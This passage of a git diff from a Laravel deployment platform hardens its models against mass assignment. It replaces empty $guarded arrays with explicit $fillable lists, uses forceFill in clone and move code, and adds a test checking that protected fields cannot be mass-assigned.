+        if ($this->resource->getMorphClass() === Application::class) {
             $new_resource = clone_application($this->resource, $new_destination, ['uuid' => $uuid], $this->cloneVolumeData);
 
             $route = route('project.application.configuration', [
@@ -71,21 +80,21 @@ public function cloneTo($destination_id)
 
             return redirect()->to($route);
         } elseif (
-            $this->resource->getMorphClass() === \App\Models\StandalonePostgresql::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneMongodb::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneMysql::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneMariadb::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneRedis::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneKeydb::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneDragonfly::class ||
-            $this->resource->getMorphClass() === \App\Models\StandaloneClickhouse::class
+            $this->resource->getMorphClass() === StandalonePostgresql::class ||
+            $this->resource->getMorphClass() === StandaloneMongodb::class ||
+            $this->resource->getMorphClass() === StandaloneMysql::class ||
+            $this->resource->getMorphClass() === StandaloneMariadb::class ||
+            $this->resource->getMorphClass() === StandaloneRedis::class ||
+            $this->resource->getMorphClass() === StandaloneKeydb::class ||
+            $this->resource->getMorphClass() === StandaloneDragonfly::class ||
+            $this->resource->getMorphClass() === StandaloneClickhouse::class
         ) {
             $uuid = (string) new Cuid2;
             $new_resource = $this->resource->replicate([
                 'id',
                 'created_at',
                 'updated_at',
-            ])->fill([
+            ])->forceFill([
                 'uuid' => $uuid,
                 'name' => $this->resource->name.'-clone-'.$uuid,
                 'status' => 'exited',
@@ -133,7 +142,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'name' => $newName,
                     'resource_id' => $new_resource->id,
                 ]);
@@ -162,7 +171,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'resource_id' => $new_resource->id,
                 ]);
                 $newStorage->save();
@@ -175,7 +184,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => $uuid,
                     'database_id' => $new_resource->id,
                     'database_type' => $new_resource->getMorphClass(),
@@ -194,7 +203,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill($payload);
+                ])->forceFill($payload);
                 $newEnvironmentVariable->save();
             }
 
@@ -211,7 +220,7 @@ public function cloneTo($destination_id)
                 'id',
                 'created_at',
                 'updated_at',
-            ])->fill([
+            ])->forceFill([
                 'uuid' => $uuid,
                 'name' => $this->resource->name.'-clone-'.$uuid,
                 'destination_id' => $new_destination->id,
@@ -232,7 +241,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'uuid' => (string) new Cuid2,
                     'service_id' => $new_resource->id,
                     'team_id' => currentTeam()->id,
@@ -246,7 +255,7 @@ public function cloneTo($destination_id)
                     'id',
                     'created_at',
                     'updated_at',
-                ])->fill([
+                ])->forceFill([
                     'resourceable_id' => $new_resource->id,
                     'resourceable_type' => $new_resource->getMorphClass(),
                 ]);
@@ -254,9 +263,9 @@ public function cloneTo($destination_id)
             }
 
             foreach ($new_resource->applications() as $application) {
-                $application->update([
+                $application->forceFill([
                     'status' => 'exited',
-                ]);
+                ])->save();
 
                 $persistentVolumes = $application->persistentStorages()->get();
                 foreach ($persistentVolumes as $volume) {
@@ -271,7 +280,7 @@ public function cloneTo($destination_id)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $application->id,
                     ]);
@@ -296,9 +305,9 @@ public function cloneTo($destination_id)
             }
 
             foreach ($new_resource->databases() as $database) {
-                $database->update([
+                $database->forceFill([
                     'status' => 'exited',
-                ]);
+                ])->save();
 
                 $persistentVolumes = $database->persistentStorages()->get();
                 foreach ($persistentVolumes as $volume) {
@@ -313,7 +322,7 @@ public function cloneTo($destination_id)
                         'id',
                         'created_at',
                         'updated_at',
-                    ])->fill([
+                    ])->forceFill([
                         'name' => $newName,
                         'resource_id' => $database->id,
                     ]);
@@ -354,9 +363,9 @@ public function moveTo($environment_id)
         try {
             $this->authorize('update', $this->resource);
             $new_environment = Environment::ownedByCurrentTeam()->findOrFail($environment_id);
-            $this->resource->update([
+            $this->resource->forceFill([
                 'environment_id' => $environment_id,
-            ]);
+            ])->save();
             if ($this->resource->type() === 'application') {
                 $route = route('project.application.configuration', [
                     'project_uuid' => $new_environment->project->uuid,
diff --git a/app/Models/Application.php b/app/Models/Application.php
index c446052b3..a4789ae4a 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -118,7 +118,92 @@ class Application extends BaseModel
 
     private static $parserVersion = '5';
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'fqdn',
+        'git_repository',
+        'git_branch',
+        'git_commit_sha',
+        'git_full_url',
+        'docker_registry_image_name',
+        'docker_registry_image_tag',
+        'build_pack',
+        'static_image',
+        'install_command',
+        'build_command',
+        'start_command',
+        'ports_exposes',
+        'ports_mappings',
+        'base_directory',
+        'publish_directory',
+        'health_check_enabled',
+        'health_check_path',
+        'health_check_port',
+        'health_check_host',
+        'health_check_method',
+        'health_check_return_code',
+        'health_check_scheme',
+        'health_check_response_text',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
+        'health_check_type',
+        'health_check_command',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'status',
+        'preview_url_template',
+        'dockerfile',
+        'dockerfile_location',
+        'dockerfile_target_build',
+        'custom_labels',
+        'custom_docker_run_options',
+        'post_deployment_command',
+        'post_deployment_command_container',
+        'pre_deployment_command',
+        'pre_deployment_command_container',
+        'manual_webhook_secret_github',
+        'manual_webhook_secret_gitlab',
+        'manual_webhook_secret_bitbucket',
+        'manual_webhook_secret_gitea',
+        'docker_compose_location',
+        'docker_compose_pr_location',
+        'docker_compose',
+        'docker_compose_pr',
+        'docker_compose_raw',
+        'docker_compose_pr_raw',
+        'docker_compose_domains',
+        'docker_compose_custom_start_command',
+        'docker_compose_custom_build_command',
+        'swarm_replicas',
+        'swarm_placement_constraints',
+        'watch_paths',
+        'redirect',
+        'compose_parsing_version',
+        'custom_nginx_configuration',
+        'custom_network_aliases',
+        'custom_healthcheck_found',
+        'nixpkgsarchive',
+        'is_http_basic_auth_enabled',
+        'http_basic_auth_username',
+        'http_basic_auth_password',
+        'connect_to_docker_network',
+        'force_domain_override',
+        'is_container_label_escape_enabled',
+        'use_build_server',
+        'config_hash',
+        'last_online_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+    ];
 
     protected $appends = ['server_status'];
 
@@ -1145,7 +1230,7 @@ public function getGitRemoteStatus(string $deployment_uuid)
                 'is_accessible' => true,
                 'error' => null,
             ];
-        } catch (\RuntimeException $ex) {
+        } catch (RuntimeException $ex) {
             return [
                 'is_accessible' => false,
                 'error' => $ex->getMessage(),
@@ -1202,7 +1287,7 @@ public function generateGitLsRemoteCommands(string $deployment_uuid, bool $exec_
                 ];
             }
 
-            if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+            if ($this->source->getMorphClass() === GitlabApp::class) {
                 $gitlabSource = $this->source;
                 $private_key = data_get($gitlabSource, 'privateKey.private_key');
 
@@ -1354,7 +1439,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
             $source_html_url_host = $url['host'];
             $source_html_url_scheme = $url['scheme'];
 
-            if ($this->source->getMorphClass() === \App\Models\GithubApp::class) {
+            if ($this->source->getMorphClass() === GithubApp::class) {
                 if ($this->source->is_public) {
                     $fullRepoUrl = "{$this->source->html_url}/{$customRepository}";
                     $escapedRepoUrl = escapeshellarg("{$this->source->html_url}/{$customRepository}");
@@ -1409,7 +1494,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                 ];
             }
 
-            if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+            if ($this->source->getMorphClass() === GitlabApp::class) {
                 $gitlabSource = $this->source;
                 $private_key = data_get($gitlabSource, 'privateKey.private_key');
 
@@ -1600,7 +1685,7 @@ public function oldRawParser()
         try {
             $yaml = Yaml::parse($this->docker_compose_raw);
         } catch (\Exception $e) {
-            throw new \RuntimeException($e->getMessage());
+            throw new RuntimeException($e->getMessage());
         }
         $services = data_get($yaml, 'services');
 
@@ -1682,7 +1767,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
         $fileList = collect([".$workdir$composeFile"]);
         $gitRemoteStatus = $this->getGitRemoteStatus(deployment_uuid: $uuid);
         if (! $gitRemoteStatus['is_accessible']) {
-            throw new \RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
+            throw new RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
         }
         $getGitVersion = instant_remote_process(['git --version'], $this->destination->server, false);
         $gitVersion = str($getGitVersion)->explode(' ')->last();
@@ -1732,15 +1817,15 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
             $this->save();
 
             if (str($e->getMessage())->contains('No such file')) {
-                throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
+                throw new RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
             }
             if (str($e->getMessage())->contains('fatal: repository') && str($e->getMessage())->contains('does not exist')) {
                 if ($this->deploymentType() === 'deploy_key') {
-                    throw new \RuntimeException('Your deploy key does not have access to the repository. Please check your deploy key and try again.');
+                    throw new RuntimeException('Your deploy key does not have access to the repository. Please check your deploy key and try again.');
                 }
-                throw new \RuntimeException('Repository does not exist. Please check your repository URL and try again.');
+                throw new RuntimeException('Repository does not exist. Please check your repository URL and try again.');
             }
-            throw new \RuntimeException($e->getMessage());
+            throw new RuntimeException($e->getMessage());
         } finally {
             // Cleanup only - restoration happens in catch block
             $commands = collect([
@@ -1793,7 +1878,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
             $this->base_directory = $initialBaseDirectory;
             $this->save();
 
-            throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
+            throw new RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
         }
     }
 
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 9237763c8..b3dcf6353 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -265,8 +265,6 @@ public static function flushIdentityMap(): void
         'server_metadata',
     ];
 
-    protected $guarded = [];
-
     use HasSafeStringAttribute;
 
     public function type()
diff --git a/app/Models/Service.php b/app/Models/Service.php
index 84c047bb7..b3ff85e53 100644
--- a/app/Models/Service.php
+++ b/app/Models/Service.php
@@ -15,6 +15,7 @@
 use OpenApi\Attributes as OA;
 use Spatie\Activitylog\Models\Activity;
 use Spatie\Url\Url;
+use Symfony\Component\Yaml\Yaml;
 use Visus\Cuid2\Cuid2;
 
 #[OA\Schema(
@@ -47,7 +48,16 @@ class Service extends BaseModel
 
     private static $parserVersion = '5';
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'docker_compose_raw',
+        'docker_compose',
+        'connect_to_docker_network',
+        'service_type',
+        'config_hash',
+        'compose_parsing_version',
+    ];
 
     protected $appends = ['server_status', 'status'];
 
@@ -1552,7 +1562,7 @@ public function saveComposeConfigs()
         // Generate SERVICE_NAME_* environment variables from docker-compose services
         if ($this->docker_compose) {
             try {
-                $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($this->docker_compose);
+                $dockerCompose = Yaml::parse($this->docker_compose);
                 $services = data_get($dockerCompose, 'services', []);
                 foreach ($services as $serviceName => $_) {
                     $envs->push('SERVICE_NAME_'.str($serviceName)->replace('-', '_')->replace('.', '_')->upper().'='.$serviceName);
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 143aadb6a..74382d87c 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -13,7 +13,31 @@ class StandaloneClickhouse extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'clickhouse_admin_user',
+        'clickhouse_admin_password',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index c823c305b..7cc74f0ce 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -13,7 +13,30 @@ class StandaloneDragonfly extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'dragonfly_password',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index f286e8538..7a0d7f03d 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -13,7 +13,31 @@ class StandaloneKeydb extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'keydb_password',
+        'keydb_conf',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'server_status'];
 
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index efa62353c..6cac9e5f4 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -14,7 +14,32 @@ class StandaloneMariadb extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'mariadb_root_password',
+        'mariadb_user',
+        'mariadb_password',
+        'mariadb_database',
+        'mariadb_conf',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index 9418ebc21..5ca4ef5d3 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -13,7 +13,31 @@ class StandaloneMongodb extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'mongo_conf',
+        'mongo_initdb_root_username',
+        'mongo_initdb_root_password',
+        'mongo_initdb_database',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index 2b7e9f2b6..cf8d78a9c 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -13,7 +13,32 @@ class StandaloneMysql extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'mysql_root_password',
+        'mysql_user',
+        'mysql_password',
+        'mysql_database',
+        'mysql_conf',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index cea600236..7db334c5d 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -13,7 +13,34 @@ class StandalonePostgresql extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'postgres_user',
+        'postgres_password',
+        'postgres_db',
+        'postgres_initdb_args',
+        'postgres_host_auth_method',
+        'postgres_conf',
+        'init_scripts',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 0e904ab31..812a0e5cb 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -13,7 +13,29 @@ class StandaloneRedis extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'redis_password',
+        'redis_conf',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 5a7b377b6..4b9751706 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -40,7 +40,14 @@ class Team extends Model implements SendsDiscord, SendsEmail, SendsPushover, Sen
 {
     use HasFactory, HasNotificationSettings, HasSafeStringAttribute, Notifiable;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'show_boarding',
+        'custom_server_limit',
+        'use_instance_email_settings',
+        'resend_api_key',
+    ];
 
     protected $casts = [
         'personal_team' => 'boolean',
diff --git a/app/Models/User.php b/app/Models/User.php
index 4561cddb2..6b6f93239 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -4,7 +4,9 @@
 
 use App\Jobs\UpdateStripeCustomerEmailJob;
 use App\Notifications\Channels\SendsEmail;
+use App\Notifications\TransactionalEmails\EmailChangeVerification;
 use App\Notifications\TransactionalEmails\ResetPassword as TransactionalEmailsResetPassword;
+use App\Services\ChangelogService;
 use App\Traits\DeletesUserSessions;
 use DateTimeInterface;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
@@ -41,7 +43,16 @@ class User extends Authenticatable implements SendsEmail
 {
     use DeletesUserSessions, HasApiTokens, HasFactory, Notifiable, TwoFactorAuthenticatable;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'email',
+        'password',
+        'force_password_reset',
+        'marketing_emails',
+        'pending_email',
+        'email_change_code',
+        'email_change_code_expires_at',
+    ];
 
     protected $hidden = [
         'password',
@@ -228,7 +239,7 @@ public function changelogReads()
 
     public function getUnreadChangelogCount(): int
     {
-        return app(\App\Services\ChangelogService::class)->getUnreadCountForUser($this);
+        return app(ChangelogService::class)->getUnreadCountForUser($this);
     }
 
     public function getRecipients(): array
@@ -239,7 +250,7 @@ public function getRecipients(): array
     public function sendVerificationEmail()
     {
         $mail = new MailMessage;
-        $url = Url::temporarySignedRoute(
+        $url = URL::temporarySignedRoute(
             'verify.verify',
             Carbon::now()->addMinutes(Config::get('auth.verification.expire', 60)),
             [
@@ -408,7 +419,7 @@ public function requestEmailChange(string $newEmail): void
         ]);
 
         // Send verification email to new address
-        $this->notify(new \App\Notifications\TransactionalEmails\EmailChangeVerification($this, $code, $newEmail, $expiresAt));
+        $this->notify(new EmailChangeVerification($this, $code, $newEmail, $expiresAt));
     }
 
     public function isEmailChangeCodeValid(string $code): bool
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index c522cd0ca..fbcedf277 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -6,6 +6,7 @@
 use App\Jobs\VolumeCloneJob;
 use App\Models\Application;
 use App\Models\ApplicationDeploymentQueue;
+use App\Models\EnvironmentVariable;
 use App\Models\Server;
 use App\Models\StandaloneDocker;
 use Spatie\Url\Url;
@@ -192,7 +193,7 @@ function clone_application(Application $source, $destination, array $overrides =
     $server = $destination->server;
 
     if ($server->team_id !== currentTeam()->id) {
-        throw new \RuntimeException('Destination does not belong to the current team.');
+        throw new RuntimeException('Destination does not belong to the current team.');
     }
 
     // Prepare name and URL
@@ -211,7 +212,7 @@ function clone_application(Application $source, $destination, array $overrides =
         'updated_at',
         'additional_servers_count',
         'additional_networks_count',
-    ])->fill(array_merge([
+    ])->forceFill(array_merge([
         'uuid' => $uuid,
         'name' => $name,
         'fqdn' => $url,
@@ -322,8 +323,8 @@ function clone_application(Application $source, $destination, array $overrides =
                     destination: $source->destination,
                     no_questions_asked: true
                 );
-            } catch (\Exception $e) {
-                \Log::error('Failed to copy volume data for '.$volume->name.': '.$e->getMessage());
+            } catch (Exception $e) {
+                Log::error('Failed to copy volume data for '.$volume->name.': '.$e->getMessage());
             }
         }
     }
@@ -344,7 +345,7 @@ function clone_application(Application $source, $destination, array $overrides =
     // Clone production environment variables without triggering the created hook
     $environmentVariables = $source->environment_variables()->get();
     foreach ($environmentVariables as $environmentVariable) {
-        \App\Models\EnvironmentVariable::withoutEvents(function () use ($environmentVariable, $newApplication) {
+        EnvironmentVariable::withoutEvents(function () use ($environmentVariable, $newApplication) {
             $newEnvironmentVariable = $environmentVariable->replicate([
                 'id',
                 'created_at',
@@ -361,7 +362,7 @@ function clone_application(Application $source, $destination, array $overrides =
     // Clone preview environment variables
     $previewEnvironmentVariables = $source->environment_variables_preview()->get();
     foreach ($previewEnvironmentVariables as $previewEnvironmentVariable) {
-        \App\Models\EnvironmentVariable::withoutEvents(function () use ($previewEnvironmentVariable, $newApplication) {
+        EnvironmentVariable::withoutEvents(function () use ($previewEnvironmentVariable, $newApplication) {
             $newPreviewEnvironmentVariable = $previewEnvironmentVariable->replicate([
                 'id',
                 'created_at',
diff --git a/tests/Feature/MassAssignmentProtectionTest.php b/tests/Feature/MassAssignmentProtectionTest.php
new file mode 100644
index 000000000..f6518648f
--- /dev/null
+++ b/tests/Feature/MassAssignmentProtectionTest.php
@@ -0,0 +1,182 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use App\Models\Team;
+use App\Models\User;
+
+describe('mass assignment protection', function () {
+
+    test('no API-exposed model uses unguarded $guarded = []', function () {
+        $models = [
+            Application::class,
+            Service::class,
+            User::class,
+            Team::class,
+            Server::class,
+            StandalonePostgresql::class,
+            StandaloneRedis::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+            StandaloneClickhouse::class,
+        ];
+
+        foreach ($models as $modelClass) {
+            $model = new $modelClass;
+            $guarded = $model->getGuarded();
+            $fillable = $model->getFillable();
+
+            // Model must NOT have $guarded = [] (empty guard = no protection)
+            // It should either have non-empty $guarded OR non-empty $fillable
+            $hasProtection = $guarded !== ['*'] ? count($guarded) > 0 : true;
+            $hasProtection = $hasProtection || count($fillable) > 0;
+
+            expect($hasProtection)
+                ->toBeTrue("Model {$modelClass} has no mass assignment protection (empty \$guarded and empty \$fillable)");
+        }
+    });
+
+    test('Application model blocks mass assignment of relationship IDs', function () {
+        $application = new Application;
+        $dangerousFields = ['id', 'uuid', 'environment_id', 'destination_id', 'destination_type', 'source_id', 'source_type', 'private_key_id', 'repository_project_id'];
+
+        foreach ($dangerousFields as $field) {
+            expect($application->isFillable($field))
+                ->toBeFalse("Application model should not allow mass assignment of '{$field}'");
+        }
+    });
+
+    test('Application model allows mass assignment of user-facing fields', function () {
+        $application = new Application;
+        $userFields = ['name', 'description', 'git_repository', 'git_branch', 'build_pack', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'health_check_path', 'limits_memory', 'status'];
+
+        foreach ($userFields as $field) {
+            expect($application->isFillable($field))
+                ->toBeTrue("Application model should allow mass assignment of '{$field}'");
+        }
+    });
+
+    test('Server model has $fillable and no conflicting $guarded', function () {
+        $server = new Server;
+        $fillable = $server->getFillable();
+        $guarded = $server->getGuarded();
+
+        expect($fillable)->not->toBeEmpty('Server model should have explicit $fillable');
+
+        // Guarded should be the default ['*'] when $fillable is set, not []
+        expect($guarded)->not->toBe([], 'Server model should not have $guarded = [] overriding $fillable');
+    });
+
+    test('Server model blocks mass assignment of dangerous fields', function () {
+        $server = new Server;
+
+        // These fields should not be mass-assignable via the API
+        expect($server->isFillable('id'))->toBeFalse();
+        expect($server->isFillable('uuid'))->toBeFalse();
+        expect($server->isFillable('created_at'))->toBeFalse();
+    });
+
+    test('User model blocks mass assignment of auth-sensitive fields', function () {
+        $user = new User;
+
+        expect($user->isFillable('id'))->toBeFalse('User id should not be fillable');
+        expect($user->isFillable('email_verified_at'))->toBeFalse('email_verified_at should not be fillable');
+        expect($user->isFillable('remember_token'))->toBeFalse('remember_token should not be fillable');
+        expect($user->isFillable('two_factor_secret'))->toBeFalse('two_factor_secret should not be fillable');
+        expect($user->isFillable('two_factor_recovery_codes'))->toBeFalse('two_factor_recovery_codes should not be fillable');
+    });
+
+    test('User model allows mass assignment of profile fields', function () {
+        $user = new User;
+
+        expect($user->isFillable('name'))->toBeTrue();
+        expect($user->isFillable('email'))->toBeTrue();
+        expect($user->isFillable('password'))->toBeTrue();
+    });
+
+    test('Team model blocks mass assignment of internal fields', function () {
+        $team = new Team;
+
+        expect($team->isFillable('id'))->toBeFalse();
+        expect($team->isFillable('personal_team'))->toBeFalse('personal_team should not be fillable');
+    });
+
+    test('standalone database models block mass assignment of relationship IDs', function () {
+        $models = [
+            StandalonePostgresql::class,
+            StandaloneRedis::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+            StandaloneClickhouse::class,
+        ];
+
+        foreach ($models as $modelClass) {
+            $model = new $modelClass;
+            $dangerousFields = ['id', 'uuid', 'environment_id', 'destination_id', 'destination_type'];
+
+            foreach ($dangerousFields as $field) {
+                expect($model->isFillable($field))
+                    ->toBeFalse("Model {$modelClass} should not allow mass assignment of '{$field}'");
+            }
+        }
+    });
+
+    test('standalone database models allow mass assignment of config fields', function () {
+        $model = new StandalonePostgresql;
+        expect($model->isFillable('name'))->toBeTrue();
